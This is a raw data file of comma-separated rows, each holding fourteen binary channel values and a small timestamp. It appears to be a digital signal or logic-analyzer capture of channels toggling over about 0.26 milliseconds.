0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680628e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680728e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680928e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7680952e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7680980e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681028e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681128e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681132e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7681152e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681180e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7681204e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681228e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7681252e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681276e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7681300e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681328e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7681352e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681380e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,1.7681404e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,1.7681428e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681436e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681500e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681528e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681552e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681604e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681628e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681728e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681928e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7681952e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7681980e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682028e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682128e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682152e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682180e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682204e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682228e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682328e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682352e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682380e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682404e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682428e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682524e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682548e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682572e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682596e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7682620e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7682648e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7807588e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7807796e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,1.7807824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7807844e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7808156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7808180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7808204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7808228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7808256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7808280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7808304e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7808332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7808356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7808380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,1.7808404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808420e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808456e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808656e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808708e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808856e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808908e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7808956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7808980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809056e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809108e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809256e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809308e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809480e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809508e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809532e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809556e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809680e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809708e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809856e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809908e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7809932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7809980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810056e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810080e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810108e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810132e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810156e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810256e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810280e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810308e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810332e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810356e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810456e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810508e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810928e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7810952e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7810980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811128e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811528e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811928e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7811952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7811980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812128e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812528e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812928e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7812952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7812980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813128e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813528e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813928e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7813952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7813980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814128e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814528e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,1.7814728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,1.7814752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,1.7939492e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7939688e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,1.7939692e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7939708e-02 0,0,0,1,1,0,0,0,0,0,0,1,0,1,1.7939740e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7939764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.7940044e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7940068e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.7940096e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7940120e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.7940148e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7940172e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.7940196e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7940220e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.7940244e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7940268e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,1.7940296e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.7940320e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940324e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940348e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940372e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940396e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940420e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940444e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940468e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940492e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940516e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940544e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940572e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940596e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940620e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940644e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940668e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940692e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940716e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940740e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940768e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940792e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940820e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940844e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940868e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940892e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940916e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7940968e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7940996e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941020e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941044e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941068e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941092e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941116e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941144e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941168e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941192e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941220e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941244e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941268e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,1.7941292e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,1.7941316e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,1.7941324e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,1.7941368e-02 